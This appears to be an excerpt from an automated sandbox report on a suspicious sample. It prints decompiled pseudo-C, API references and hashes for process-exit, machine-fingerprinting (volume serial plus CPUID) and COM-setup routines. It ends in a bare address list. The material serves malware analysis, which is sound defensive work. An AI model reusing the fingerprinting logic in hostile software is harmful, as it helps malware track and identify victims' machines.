0x013053a8
0x013053aa
0x013053b0
0x013053b6
0x013053b6
0x013053b0
0x013053a2
0x013053be
0x013053cc

Strings

d, xrefs: 01305350
@, xrefs: 01304EFB
h, xrefs: 0130531E
;, xrefs: 01304EC3
#, xrefs: 01305388
(, xrefs: 0130533C

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID:
String ID: #$($;$@$d$h
API String ID: 0-3205887084
Opcode ID: 6e34ed39cc5010f09b2d552e0576b1bd8c219f4a360c4eee76c96628ea0a3b5f
Instruction ID: a8e21576c5cfd85f17522ae0323edaebb8be7999087d8dfa4e75567639c9b445
Opcode Fuzzy Hash: 6e34ed39cc5010f09b2d552e0576b1bd8c219f4a360c4eee76c96628ea0a3b5f
Instruction Fuzzy Hash: B1F1CEB0801245DFEB11DF58D894B9EBBF5AF21308F5440A8D948AB382D7759E88CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01352C19, Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E01352C19(int _a4) {
				void* _t14;

				if(E013565EF(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E01352C5B(_t14, _a4);
				ExitProcess(_a4);
			}

0x01352c26
0x01352c42
0x01352c42
0x01352c4b
0x01352c54

APIs

GetCurrentProcess.KERNEL32(?,?,01352C18,?,?,?,?), ref: 01352C3B
TerminateProcess.KERNEL32(00000000,?,01352C18,?,?,?,?), ref: 01352C42
ExitProcess.KERNEL32 ref: 01352C54

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 3d962f33edff6a28c8a5a666ca2ff3c7ceeafec5eafd3c358a100c98313d1f4b
Instruction ID: 408b7175f01bf791533e7072edc39a2d90e8429a30305452012f79b99c96dde5
Opcode Fuzzy Hash: 3d962f33edff6a28c8a5a666ca2ff3c7ceeafec5eafd3c358a100c98313d1f4b
Instruction Fuzzy Hash: 31E0B631240148EFCF667FA8E949D4A3F6DEB61B4AF404414F90586126CB35E982CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01306180, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 49%

			E01306180(intOrPtr __ebx, intOrPtr __edx, void* __edi, void* __eflags, signed short* _a4) {
				WCHAR* _v8;
				char _v16;
				signed int _v20;
				long _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				char _v40;
				char _v48;
				signed int _v52;
				WCHAR* _v56;
				char _v72;
				intOrPtr _v76;
				WCHAR* _v80;
				char _v96;
				signed short* _v100;
				signed short* _v104;
				void* __esi;
				void* __ebp;
				signed int _t62;
				signed int _t63;
				intOrPtr* _t72;
				signed short* _t76;
				signed int _t77;
				void* _t88;
				intOrPtr _t104;
				signed int _t110;
				signed short* _t112;
				intOrPtr* _t113;
				intOrPtr _t114;
				signed int _t116;
				void* _t117;
				signed short* _t120;
				void* _t121;
				signed int _t122;
				void* _t123;
				void* _t124;

				_t104 = __edx;
				_push(0xffffffff);
				_push(0x136687d);
				_push( *[fs:0x0]);
				_t124 = _t123 - 0x58;
				_t62 =  *0x13a4018; // 0x39cca9f6
				_t63 = _t62 ^ _t122;
				_v20 = _t63;
				_push(__ebx);
				_push(_t117);
				_push(_t63);
				 *[fs:0x0] =  &_v16;
				_t112 = _a4;
				_push(0x34);
				_v100 = _t112;
				_v104 = _t112;
				_v56 = 0;
				_v52 = 7;
				_v72 = 0;
				E012F51B0(__ebx,  &_v72, _t112, _t117, L"AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz");
				_v8 = 0;
				_push(1);
				_v80 = 0;
				_v76 = 7;
				_v96 = 0;
				E012F51B0(__ebx,  &_v96, _t112, _t117, ".");
				_v8 = 1;
				_v24 = 0;
				GetVolumeInformationW(0, 0, 0,  &_v24, 0, 0, 0, 0); // executed
				_push(__ebx);
				asm("cpuid");
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x24], xmm0");
				_pop(_t88);
				_t113 =  &_v40;
				 *_t113 = 0;
				_t72 = _t113;
				 *((intOrPtr*)(_t72 + 4)) = __ebx;
				 *((intOrPtr*)(_t72 + 8)) = 0;
				 *((intOrPtr*)(_t72 + 0xc)) = _t104;
				E012F8010(_t88,  &_v48, _v32 + _v28 + _v36 + _v40 + _v24, _t113);
				_t114 = _v100;
				_v8 = 2;
				_t110 = _v28;
				_t95 =  >=  ? _v48 :  &_v48;
				_t120 =  >=  ? _v48 :  &_v48;
				_t76 =  &(( >=  ? _v48 :  &_v48)[_v32]);
				_v104 = _t76;
				if(_t120 != _t76) {
					_t116 = _v52;
					asm("o16 nop [eax+eax]");
					do {
						_t84 = ( *_t120 & 0x0000ffff) - 0x30;
						if(( *_t120 & 0x0000ffff) - 0x30 < _v56) {
							_t102 =  >=  ? _v72 :  &_v72;
							E012FC140(_t88,  &_v96, _t116, _t120,  *(( >=  ? _v72 :  &_v72) + _t84 * 2) & 0x0000ffff);
						}
						_t120 =  &(_t120[1]);
					} while (_t120 != _v104);
					_t114 = _v100;
					_t110 = _v28;
				}
				 *(_t114 + 0x10) = 0;
				 *(_t114 + 0x14) = 0;
				asm("movups xmm0, [ebp-0x5c]");
				asm("movups [edi], xmm0");
				asm("movq xmm0, [ebp-0x4c]");
				asm("movq [edi+0x10], xmm0");
				if(_t110 >= 8) {
					_push(2 + _t110 * 2);
					E012F56A0(_t88, _t114, _v48);
					_t124 = _t124 + 8;
				}
				_t77 = _v52;
				if(_t77 >= 8) {
					_push(2 + _t77 * 2);
					E012F56A0(_t88, _t114, _v72);
				}
				 *[fs:0x0] = _v16;
				_pop(_t121);
				return E0132EA79(_v20 ^ _t122, _t121);
			}

0x01306180
0x01306183
0x01306185
0x01306190
0x01306191
0x01306194
0x01306199
0x0130619b
0x0130619e
0x0130619f
0x013061a1
0x013061a5
0x013061ab
0x013061b1
0x013061b5
0x013061bd
0x013061c0
0x013061c7
0x013061ce
0x013061d2
0x013061d7
0x013061e1
0x013061e5
0x013061f1
0x013061f8
0x013061fc
0x0130620c
0x01306217
0x0130621e
0x01306228
0x01306229
0x0130622b
0x01306230
0x01306234
0x01306235
0x01306238
0x0130623a
0x0130623c
0x0130623f
0x01306245
0x0130625a
0x0130625f
0x01306265
0x0130626c
0x01306275
0x01306279
0x0130627d
0x01306280
0x01306285
0x01306287
0x0130628a
0x01306290
0x01306293
0x01306299
0x013062a1
0x013062ad
0x013062ad
0x013062b2
0x013062b5
0x013062ba
0x013062bd
0x013062bd
0x013062c0
0x013062c7
0x013062ce
0x013062d2
0x013062d5
0x013062da
0x013062e2
0x013062eb
0x013062ef
0x013062f4
0x013062f4
0x013062f7
0x013062fd
0x01306306
0x0130630a
0x0130630f
0x01306317
0x01306320
0x0130632f

APIs

GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,013836C8,00000001,AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz,00000034,39CCA9F6), ref: 0130621E

Strings

AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz, xrefs: 013061B8

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: InformationVolume
String ID: AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz
API String ID: 2039140958-2288835824
Opcode ID: f4067f11e442583d6e6a94195135ced9cb2e9faae2a3dc961051b966f436ca3c
Instruction ID: 83e5dab794edca1276eb31440ae358d3700422d6f0d253cb4fa23f3318dc807b
Opcode Fuzzy Hash: f4067f11e442583d6e6a94195135ced9cb2e9faae2a3dc961051b966f436ca3c
Instruction Fuzzy Hash: BE515871E10209DBDB10CFA8C985BEEFBB5FF58314F60811AE905BB290D774AA55CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01315590, Relevance: 3.4, APIs: 2, Instructions: 437
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E01315590(void* __ebx, intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				char _v44;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t207;
				intOrPtr _t210;
				short* _t213;
				signed int _t215;
				short* _t216;
				signed int _t218;
				short* _t219;
				signed int _t221;
				short* _t222;
				signed int _t224;
				short* _t225;
				signed int _t227;
				short* _t228;
				signed int _t230;
				short* _t231;
				signed int _t233;
				short* _t234;
				signed int _t236;
				short* _t237;
				signed int _t239;
				short* _t240;
				signed int _t242;
				short* _t243;
				signed int _t245;
				short* _t246;
				signed int _t248;
				intOrPtr _t279;
				intOrPtr _t282;
				intOrPtr _t285;
				intOrPtr _t288;
				intOrPtr _t291;
				intOrPtr _t294;
				intOrPtr _t297;
				intOrPtr _t300;
				intOrPtr _t303;
				intOrPtr _t306;
				intOrPtr _t309;
				intOrPtr _t312;
				intOrPtr _t339;
				void* _t341;
				signed int _t343;
				void* _t344;
				void* _t345;

				_t273 = __ebx;
				_push(0xffffffff);
				_push(0x13683eb);
				_push( *[fs:0x0]);
				_t345 = _t344 - 0x1c;
				_push(_t341);
				_t207 =  *0x13a4018; // 0x39cca9f6
				_push(_t207 ^ _t343);
				 *[fs:0x0] =  &_v16;
				_t339 = __ecx;
				_v20 = __ecx;
				_t210 = _a8;
				 *((intOrPtr*)(__ecx)) = _t210;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				_v8 = 1;
				_t347 = _t210;
				if(_t210 > 0) {
					_t13 = _t339 + 0x10; // 0x10
					E012F8140(_t13, __ecx, 0, _a4);
					_t213 = E012F93F0( &_v44, 0x13a756c, __ecx, _t347);
					_v8 = 2;
					_t279 =  *((intOrPtr*)(__ecx + 0x14));
					if(_t279 ==  *((intOrPtr*)(__ecx + 0x18))) {
						_push(_t213);
						_t24 = _t339 + 0x10; // 0x10
						E012F54C0(__ebx, _t24, __ecx, _t341, _t279);
					} else {
						 *((intOrPtr*)(_t279 + 0x10)) = 0;
						 *((intOrPtr*)(_t279 + 0x14)) = 0;
						asm("movups xmm0, [eax]");
						asm("movups [ecx], xmm0");
						asm("movq xmm0, [eax+0x10]");
						asm("movq [ecx+0x10], xmm0");
						 *((intOrPtr*)(_t213 + 0x10)) = 0;
						 *((intOrPtr*)(_t213 + 0x14)) = 7;
						 *_t213 = 0;
						 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + 0x18;
					}
					_v8 = 1;
					_t215 = _v24;
					_t349 = _t215 - 8;
					if(_t215 >= 8) {
						_push(2 + _t215 * 2);
						E012F56A0(_t273, _t339, _v44);
						_t345 = _t345 + 8;
					}
					_t216 = E012F93F0( &_v44, 0x13a753c, _t339, _t349);
					_v8 = 3;
					_t282 =  *((intOrPtr*)(_t339 + 0x14));
					if(_t282 ==  *((intOrPtr*)(_t339 + 0x18))) {
						_push(_t216);
						_t40 = _t339 + 0x10; // 0x10
						E012F54C0(_t273, _t40, _t339, _t341, _t282);
					} else {
						 *((intOrPtr*)(_t282 + 0x10)) = 0;
						 *((intOrPtr*)(_t282 + 0x14)) = 0;
						asm("movups xmm0, [eax]");
						asm("movups [ecx], xmm0");
						asm("movq xmm0, [eax+0x10]");
						asm("movq [ecx+0x10], xmm0");
						 *((intOrPtr*)(_t216 + 0x10)) = 0;
						 *((intOrPtr*)(_t216 + 0x14)) = 7;
						 *_t216 = 0;
						 *((intOrPtr*)(_t339 + 0x14)) =  *((intOrPtr*)(_t339 + 0x14)) + 0x18;
					}
					_v8 = 1;
					_t218 = _v24;
					_t351 = _t218 - 8;
					if(_t218 >= 8) {
						_push(2 + _t218 * 2);
						E012F56A0(_t273, _t339, _v44);
						_t345 = _t345 + 8;
					}
					_t219 = E012F93F0( &_v44, 0x13a7404, _t339, _t351);
					_v8 = 4;
					_t285 =  *((intOrPtr*)(_t339 + 0x14));
					if(_t285 ==  *((intOrPtr*)(_t339 + 0x18))) {
						_push(_t219);
						_t56 = _t339 + 0x10; // 0x10
						E012F54C0(_t273, _t56, _t339, _t341, _t285);
					} else {
						 *((intOrPtr*)(_t285 + 0x10)) = 0;
						 *((intOrPtr*)(_t285 + 0x14)) = 0;
						asm("movups xmm0, [eax]");
						asm("movups [ecx], xmm0");
						asm("movq xmm0, [eax+0x10]");
						asm("movq [ecx+0x10], xmm0");
						 *((intOrPtr*)(_t219 + 0x10)) = 0;
						 *((intOrPtr*)(_t219 + 0x14)) = 7;
						 *_t219 = 0;
						 *((intOrPtr*)(_t339 + 0x14)) =  *((intOrPtr*)(_t339 + 0x14)) + 0x18;
					}
					_v8 = 1;
					_t221 = _v24;
					_t353 = _t221 - 8;
					if(_t221 >= 8) {
						_push(2 + _t221 * 2);
						E012F56A0(_t273, _t339, _v44);
						_t345 = _t345 + 8;
					}
					_t222 = E012F93F0( &_v44, 0x13a735c, _t339, _t353);
					_v8 = 5;
					_t288 =  *((intOrPtr*)(_t339 + 0x14));
					if(_t288 ==  *((intOrPtr*)(_t339 + 0x18))) {
						_push(_t222);
						_t72 = _t339 + 0x10; // 0x10
						E012F54C0(_t273, _t72, _t339, _t341, _t288);
					} else {
						 *((intOrPtr*)(_t288 + 0x10)) = 0;
						 *((intOrPtr*)(_t288 + 0x14)) = 0;
						asm("movups xmm0, [eax]");
						asm("movups [ecx], xmm0");
						asm("movq xmm0, [eax+0x10]");
						asm("movq [ecx+0x10], xmm0");
						 *((intOrPtr*)(_t222 + 0x10)) = 0;
						 *((intOrPtr*)(_t222 + 0x14)) = 7;
						 *_t222 = 0;
						 *((intOrPtr*)(_t339 + 0x14)) =  *((intOrPtr*)(_t339 + 0x14)) + 0x18;
					}
					_v8 = 1;
					_t224 = _v24;
					_t355 = _t224 - 8;
					if(_t224 >= 8) {
						_push(2 + _t224 * 2);
						E012F56A0(_t273, _t339, _v44);
						_t345 = _t345 + 8;
					}
					_t225 = E012F93F0( &_v44, 0x13a747c, _t339, _t355);
					_v8 = 6;
					_t291 =  *((intOrPtr*)(_t339 + 0x14));
					if(_t291 ==  *((intOrPtr*)(_t339 + 0x18))) {
						_push(_t225);
						_t88 = _t339 + 0x10; // 0x10
						E012F54C0(_t273, _t88, _t339, _t341, _t291);
					} else {
						 *((intOrPtr*)(_t291 + 0x10)) = 0;
						 *((intOrPtr*)(_t291 + 0x14)) = 0;
						asm("movups xmm0, [eax]");
						asm("movups [ecx], xmm0");
						asm("movq xmm0, [eax+0x10]");
						asm("movq [ecx+0x10], xmm0");
						 *((intOrPtr*)(_t225 + 0x10)) = 0;
						 *((intOrPtr*)(_t225 + 0x14)) = 7;
						 *_t225 = 0;
						 *((intOrPtr*)(_t339 + 0x14)) =  *((intOrPtr*)(_t339 + 0x14)) + 0x18;
					}
					_v8 = 1;
					_t227 = _v24;
					_t357 = _t227 - 8;
					if(_t227 >= 8) {
						_push(2 + _t227 * 2);
						E012F56A0(_t273, _t339, _v44);
						_t345 = _t345 + 8;
					}
					_t228 = E012F93F0( &_v44, 0x13a6f6c, _t339, _t357);
					_v8 = 7;
					_t294 =  *((intOrPtr*)(_t339 + 0x14));
					if(_t294 ==  *((intOrPtr*)(_t339 + 0x18))) {
						_push(_t228);
						_t104 = _t339 + 0x10; // 0x10
						E012F54C0(_t273, _t104, _t339, _t341, _t294);
					} else {
						 *((intOrPtr*)(_t294 + 0x10)) = 0;
						 *((intOrPtr*)(_t294 + 0x14)) = 0;
						asm("movups xmm0, [eax]");
						asm("movups [ecx], xmm0");
						asm("movq xmm0, [eax+0x10]");
						asm("movq [ecx+0x10], xmm0");
						 *((intOrPtr*)(_t228 + 0x10)) = 0;
						 *((intOrPtr*)(_t228 + 0x14)) = 7;
						 *_t228 = 0;
						 *((intOrPtr*)(_t339 + 0x14)) =  *((intOrPtr*)(_t339 + 0x14)) + 0x18;
					}
					_v8 = 1;
					_t230 = _v24;
					_t359 = _t230 - 8;
					if(_t230 >= 8) {
						_push(2 + _t230 * 2);
						E012F56A0(_t273, _t339, _v44);
						_t345 = _t345 + 8;
					}
					_t231 = E012F93F0( &_v44, 0x13a72fc, _t339, _t359);
					_v8 = 8;
					_t297 =  *((intOrPtr*)(_t339 + 0x14));
					if(_t297 ==  *((intOrPtr*)(_t339 + 0x18))) {
						_push(_t231);
						_t120 = _t339 + 0x10; // 0x10
						E012F54C0(_t273, _t120, _t339, _t341, _t297);
					} else {
						 *((intOrPtr*)(_t297 + 0x10)) = 0;
						 *((intOrPtr*)(_t297 + 0x14)) = 0;
						asm("movups xmm0, [eax]");
						asm("movups [ecx], xmm0");
						asm("movq xmm0, [eax+0x10]");
						asm("movq [ecx+0x10], xmm0");
						 *((intOrPtr*)(_t231 + 0x10)) = 0;
						 *((intOrPtr*)(_t231 + 0x14)) = 7;
						 *_t231 = 0;
						 *((intOrPtr*)(_t339 + 0x14)) =  *((intOrPtr*)(_t339 + 0x14)) + 0x18;
					}
					_v8 = 1;
					_t233 = _v24;
					_t361 = _t233 - 8;
					if(_t233 >= 8) {
						_push(2 + _t233 * 2);
						E012F56A0(_t273, _t339, _v44);
						_t345 = _t345 + 8;
					}
					_t234 = E012F93F0( &_v44, 0x13a73d4, _t339, _t361);
					_v8 = 9;
					_t300 =  *((intOrPtr*)(_t339 + 0x14));
					if(_t300 ==  *((intOrPtr*)(_t339 + 0x18))) {
						_push(_t234);
						_t136 = _t339 + 0x10; // 0x10
						E012F54C0(_t273, _t136, _t339, _t341, _t300);
					} else {
						 *((intOrPtr*)(_t300 + 0x10)) = 0;
						 *((intOrPtr*)(_t300 + 0x14)) = 0;
						asm("movups xmm0, [eax]");
						asm("movups [ecx], xmm0");
						asm("movq xmm0, [eax+0x10]");
						asm("movq [ecx+0x10], xmm0");
						 *((intOrPtr*)(_t234 + 0x10)) = 0;
						 *((intOrPtr*)(_t234 + 0x14)) = 7;
						 *_t234 = 0;
						 *((intOrPtr*)(_t339 + 0x14)) =  *((intOrPtr*)(_t339 + 0x14)) + 0x18;
					}
					_v8 = 1;
					_t236 = _v24;
					_t363 = _t236 - 8;
					if(_t236 >= 8) {
						_push(2 + _t236 * 2);
						E012F56A0(_t273, _t339, _v44);
						_t345 = _t345 + 8;
					}
					_t237 = E012F93F0( &_v44, 0x13a723c, _t339, _t363);
					_v8 = 0xa;
					_t303 =  *((intOrPtr*)(_t339 + 0x14));
					if(_t303 ==  *((intOrPtr*)(_t339 + 0x18))) {
						_push(_t237);
						_t152 = _t339 + 0x10; // 0x10
						E012F54C0(_t273, _t152, _t339, _t341, _t303);
					} else {
						 *((intOrPtr*)(_t303 + 0x10)) = 0;
						 *((intOrPtr*)(_t303 + 0x14)) = 0;
						asm("movups xmm0, [eax]");
						asm("movups [ecx], xmm0");
						asm("movq xmm0, [eax+0x10]");
						asm("movq [ecx+0x10], xmm0");
						 *((intOrPtr*)(_t237 + 0x10)) = 0;
						 *((intOrPtr*)(_t237 + 0x14)) = 7;
						 *_t237 = 0;
						 *((intOrPtr*)(_t339 + 0x14)) =  *((intOrPtr*)(_t339 + 0x14)) + 0x18;
					}
					_v8 = 1;
					_t239 = _v24;
					_t365 = _t239 - 8;
					if(_t239 >= 8) {
						_push(2 + _t239 * 2);
						E012F56A0(_t273, _t339, _v44);
						_t345 = _t345 + 8;
					}
					_t240 = E012F93F0( &_v44, 0x13a723c, _t339, _t365);
					_v8 = 0xb;
					_t306 =  *((intOrPtr*)(_t339 + 0x14));
					if(_t306 ==  *((intOrPtr*)(_t339 + 0x18))) {
						_push(_t240);
						_t168 = _t339 + 0x10; // 0x10
						E012F54C0(_t273, _t168, _t339, _t341, _t306);
					} else {
						 *((intOrPtr*)(_t306 + 0x10)) = 0;
						 *((intOrPtr*)(_t306 + 0x14)) = 0;
						asm("movups xmm0, [eax]");
						asm("movups [ecx], xmm0");
						asm("movq xmm0, [eax+0x10]");
						asm("movq [ecx+0x10], xmm0");
						 *((intOrPtr*)(_t240 + 0x10)) = 0;
						 *((intOrPtr*)(_t240 + 0x14)) = 7;
						 *_t240 = 0;
						 *((intOrPtr*)(_t339 + 0x14)) =  *((intOrPtr*)(_t339 + 0x14)) + 0x18;
					}
					_v8 = 1;
					_t242 = _v24;
					_t367 = _t242 - 8;
					if(_t242 >= 8) {
						_push(2 + _t242 * 2);
						E012F56A0(_t273, _t339, _v44);
						_t345 = _t345 + 8;
					}
					_t243 = E012F93F0( &_v44, 0x13a70d4, _t339, _t367);
					_v8 = 0xc;
					_t309 =  *((intOrPtr*)(_t339 + 0x14));
					if(_t309 ==  *((intOrPtr*)(_t339 + 0x18))) {
						_push(_t243);
						_t184 = _t339 + 0x10; // 0x10
						E012F54C0(_t273, _t184, _t339, _t341, _t309);
					} else {
						 *((intOrPtr*)(_t309 + 0x10)) = 0;
						 *((intOrPtr*)(_t309 + 0x14)) = 0;
						asm("movups xmm0, [eax]");
						asm("movups [ecx], xmm0");
						asm("movq xmm0, [eax+0x10]");
						asm("movq [ecx+0x10], xmm0");
						 *((intOrPtr*)(_t243 + 0x10)) = 0;
						 *((intOrPtr*)(_t243 + 0x14)) = 7;
						 *_t243 = 0;
						 *((intOrPtr*)(_t339 + 0x14)) =  *((intOrPtr*)(_t339 + 0x14)) + 0x18;
					}
					_v8 = 1;
					_t245 = _v24;
					_t369 = _t245 - 8;
					if(_t245 >= 8) {
						_push(2 + _t245 * 2);
						E012F56A0(_t273, _t339, _v44);
						_t345 = _t345 + 8;
					}
					_t246 = E012F93F0( &_v44, 0x13a7524, _t339, _t369);
					_v8 = 0xd;
					_t312 =  *((intOrPtr*)(_t339 + 0x14));
					if(_t312 ==  *((intOrPtr*)(_t339 + 0x18))) {
						_push(_t246);
						_t200 = _t339 + 0x10; // 0x10
						E012F54C0(_t273, _t200, _t339, _t341, _t312);
					} else {
						 *((intOrPtr*)(_t312 + 0x10)) = 0;
						 *((intOrPtr*)(_t312 + 0x14)) = 0;
						asm("movups xmm0, [eax]");
						asm("movups [ecx], xmm0");
						asm("movq xmm0, [eax+0x10]");
						asm("movq [ecx+0x10], xmm0");
						 *((intOrPtr*)(_t246 + 0x10)) = 0;
						 *((intOrPtr*)(_t246 + 0x14)) = 7;
						 *_t246 = 0;
						 *((intOrPtr*)(_t339 + 0x14)) =  *((intOrPtr*)(_t339 + 0x14)) + 0x18;
					}
					_t248 = _v24;
					if(_t248 >= 8) {
						_push(2 + _t248 * 2);
						E012F56A0(_t273, _t339, _v44);
					}
				}
				__imp__CoInitializeEx(0, 0); // executed
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0); // executed
				 *[fs:0x0] = _v16;
				return _t339;
			}

0x01315590
0x01315593
0x01315595
0x013155a0
0x013155a1
0x013155a4
0x013155a6
0x013155ad
0x013155b1
0x013155b7
0x013155b9
0x013155bc
0x013155bf
0x013155c1
0x013155c8
0x013155cf
0x013155d6
0x013155dd
0x013155e4
0x013155eb
0x013155f2
0x013155f6
0x013155f8
0x01315601
0x01315606
0x01315613
0x01315618
0x0131561c
0x01315622
0x0131565b
0x0131565d
0x01315660
0x01315624
0x01315624
0x0131562b
0x01315632
0x01315635
0x01315638
0x0131563d
0x01315644
0x0131564b
0x01315652
0x01315655
0x01315655
0x01315665
0x01315669
0x0131566c
0x0131566f
0x01315678
0x0131567c
0x01315681
0x01315681
0x0131568c
0x01315691
0x01315695
0x0131569b
0x013156d4
0x013156d6
0x013156d9
0x0131569d
0x0131569d
0x013156a4
0x013156ab
0x013156ae
0x013156b1
0x013156b6
0x013156bd
0x013156c4
0x013156cb
0x013156ce
0x013156ce
0x013156de
0x013156e2
0x013156e5
0x013156e8
0x013156f1
0x013156f5
0x013156fa
0x013156fa
0x01315705
0x0131570a
0x0131570e
0x01315714
0x0131574d
0x0131574f
0x01315752
0x01315716
0x01315716
0x0131571d
0x01315724
0x01315727
0x0131572a
0x0131572f
0x01315736
0x0131573d
0x01315744
0x01315747
0x01315747
0x01315757
0x0131575b
0x0131575e
0x01315761
0x0131576a
0x0131576e
0x01315773
0x01315773
0x0131577e
0x01315783
0x01315787
0x0131578d
0x013157c6
0x013157c8
0x013157cb
0x0131578f
0x0131578f
0x01315796
0x0131579d
0x013157a0
0x013157a3
0x013157a8
0x013157af
0x013157b6
0x013157bd
0x013157c0
0x013157c0
0x013157d0
0x013157d4
0x013157d7
0x013157da
0x013157e3
0x013157e7
0x013157ec
0x013157ec
0x013157f7
0x013157fc
0x01315800
0x01315806
0x0131583f
0x01315841
0x01315844
0x01315808
0x01315808
0x0131580f
0x01315816
0x01315819
0x0131581c
0x01315821
0x01315828
0x0131582f
0x01315836
0x01315839
0x01315839
0x01315849
0x0131584d
0x01315850
0x01315853
0x0131585c
0x01315860
0x01315865
0x01315865
0x01315870
0x01315875
0x01315879
0x0131587f
0x013158b8
0x013158ba
0x013158bd
0x01315881
0x01315881
0x01315888
0x0131588f
0x01315892
0x01315895
0x0131589a
0x013158a1
0x013158a8
0x013158af
0x013158b2
0x013158b2
0x013158c2
0x013158c6
0x013158c9
0x013158cc
0x013158d5
0x013158d9
0x013158de
0x013158de
0x013158e9
0x013158ee
0x013158f2
0x013158f8
0x01315931
0x01315933
0x01315936
0x013158fa
0x013158fa
0x01315901
0x01315908
0x0131590b
0x0131590e
0x01315913
0x0131591a
0x01315921
0x01315928
0x0131592b
0x0131592b
0x0131593b
0x0131593f
0x01315942
0x01315945
0x0131594e
0x01315952
0x01315957
0x01315957
0x01315962
0x01315967
0x0131596b
0x01315971
0x013159aa
0x013159ac
0x013159af
0x01315973
0x01315973
0x0131597a
0x01315981
0x01315984
0x01315987
0x0131598c
0x01315993
0x0131599a
0x013159a1
0x013159a4
0x013159a4
0x013159b4
0x013159b8
0x013159bb
0x013159be
0x013159c7
0x013159cb
0x013159d0
0x013159d0
0x013159db
0x013159e0
0x013159e4
0x013159ea
0x01315a23
0x01315a25
0x01315a28
0x013159ec
0x013159ec
0x013159f3
0x013159fa
0x013159fd
0x01315a00
0x01315a05
0x01315a0c
0x01315a13
0x01315a1a
0x01315a1d
0x01315a1d
0x01315a2d
0x01315a31
0x01315a34
0x01315a37
0x01315a40
0x01315a44
0x01315a49
0x01315a49
0x01315a54
0x01315a59
0x01315a5d
0x01315a63
0x01315a9c
0x01315a9e
0x01315aa1
0x01315a65
0x01315a65
0x01315a6c
0x01315a73
0x01315a76
0x01315a79
0x01315a7e
0x01315a85
0x01315a8c
0x01315a93
0x01315a96
0x01315a96
0x01315aa6
0x01315aaa
0x01315aad
0x01315ab0
0x01315ab9
0x01315abd
0x01315ac2
0x01315ac2
0x01315acd
0x01315ad2
0x01315ad6
0x01315adc
0x01315b15
0x01315b17
0x01315b1a
0x01315ade
0x01315ade
0x01315ae5
0x01315aec
0x01315aef
0x01315af2
0x01315af7
0x01315afe
0x01315b05
0x01315b0c
0x01315b0f
0x01315b0f
0x01315b1f
0x01315b23
